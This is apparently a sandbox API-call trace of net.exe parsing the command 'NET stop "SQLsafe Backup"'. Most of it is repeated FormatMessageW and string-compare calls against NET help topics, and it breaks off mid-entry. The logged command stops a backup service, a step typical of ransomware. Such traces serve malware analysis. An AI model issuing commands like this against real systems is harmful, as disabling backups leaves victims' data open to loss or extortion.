dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x47 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET VIEW\r\n[\\\\computername ", _MaxCount=0x1a) returned -3 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xc2 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NET\r\n [ ACCOUNTS | COMP", _MaxCount=0x1a) returned 19 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x319 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="SERVICES\r\nNET START can be", _MaxCount=0x1a) returned -5 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x483 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="SYNTAX\r\nThe following conv", _MaxCount=0x1a) returned -5 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xa86 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="NAMES\r\nThe following types", _MaxCount=0x1a) returned 4 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x54 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe Backup", _String2="\r\nFor more information on ", _MaxCount=0x1a) returned 97 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xad [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET ACCOUNTS\r\n[/FOR", _MaxCount=0x13) returned 18 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x2e [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET COMPUTER\r\n\\\\com", _MaxCount=0x13) returned 16 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x7d [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET CONFIG SERVER\r\n", _MaxCount=0x13) returned 16 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x26 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET CONFIG\r\n[SERVER", _MaxCount=0x13) returned 16 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x19 [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET CONTINUE\r\nservi", _MaxCount=0x13) returned 16 [0207.235] LocalFree (hMem=0x445638) returned 0x0 [0207.235] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x1b [0207.235] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET FILE\r\n[id [/CLO", _MaxCount=0x13) returned 13 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xbe [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET GROUP\r\n[groupna", _MaxCount=0x13) returned 12 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x33 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET HELP\r\ncommand\r\n", _MaxCount=0x13) returned 11 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x19 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET HELPMSG\r\nmessag", _MaxCount=0x13) returned 11 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0xc1 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET LOCALGROUP\r\n[gr", _MaxCount=0x13) returned 7 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x16 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET PAUSE\r\nservice\r", _MaxCount=0x13) returned 3 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x33 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET SESSION\r\n[\\\\com", _MaxCount=0x13) returned 15 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x234 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET SHARE\r\nsharenam", _MaxCount=0x13) returned 12 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x13 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START BROWSER\r\n", _MaxCount=0x13) returned 14 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START CLIPBOOK\r", _MaxCount=0x13) returned 14 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x14 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START EVENTLOG\r", _MaxCount=0x13) returned 14 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="嘸D⡋瓢9嘸D9") returned 0x15 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START MESSENGER", _MaxCount=0x13) returned 14 [0207.236] LocalFree (hMem=0x445638) returned 0x0 [0207.236] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="瘸D⡋瓢9嘸D9") returned 0x15 [0207.236] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START NET LOGON", _MaxCount=0x13) returned 14 [0207.236] LocalFree (hMem=0x447638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9瘸D9") returned 0x16 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START RPCLOCATO", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x11 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START RPCSS\r\n", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x14 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START SCHEDULE\r", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x12 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START SERVER\r\n", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0xf [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START UPS\r\n", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x17 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START WORKSTATI", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x18 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET START\r\n[service", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x2a [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET STATISTICS\r\n[WO", _MaxCount=0x13) returned 14 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x15 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET STOP\r\nservice\r\n", _MaxCount=0x13) returned 19 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x58 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET TIME\r\n\r\n[\\\\comp", _MaxCount=0x13) returned -1 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x184 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET USE\r\n[devicenam", _MaxCount=0x13) returned -2 [0207.237] LocalFree (hMem=0x449638) returned 0x0 [0207.237] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0xc7 [0207.237] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET USER\r\n[username", _MaxCount=0x13) returned -2 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x47 [0207.238] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET VIEW\r\n[\\\\comput", _MaxCount=0x13) returned -3 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0xc2 [0207.238] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NET\r\n [ ACCOUNTS", _MaxCount=0x13) returned 19 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x319 [0207.238] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="SERVICES\r\nNET START", _MaxCount=0x13) returned -5 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x483 [0207.238] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="SYNTAX\r\nThe followi", _MaxCount=0x13) returned -5 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0xa86 [0207.238] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="NAMES\r\nThe followin", _MaxCount=0x13) returned 4 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x54 [0207.238] _wcsnicmp (_String1="NET stop ΓÇ£SQLsafe", _String2="\r\nFor more informat", _MaxCount=0x13) returned 97 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0xad [0207.238] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x2e [0207.238] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.238] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x7d [0207.238] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0207.238] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x26 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x19 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x1b [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0xbe [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x33 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x19 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0xc1 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x16 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x33 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x234 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x13 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.239] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x14 [0207.239] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.239] LocalFree (hMem=0x449638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x14 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x449638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x15 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x449638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x15 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x449638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="阸D⡋瓢9阸D9") returned 0x16 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x449638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="䵀D⡋瓢9阸D9") returned 0x11 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x444d40) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="똸D⡋瓢9䵀D9") returned 0x14 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x44b638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="똸D⡋瓢9똸D9") returned 0x12 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x44b638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="똸D⡋瓢9똸D9") returned 0xf [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x44b638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="똸D⡋瓢9똸D9") returned 0x17 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x44b638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x39f4e0, nSize=0x0, Arguments=0x39f4dc | out: lpBuffer="똸D⡋瓢9똸D9") returned 0x18 [0207.240] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0207.240] LocalFree (hMem=0x44b638) returned 0x0 [0207.240] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, 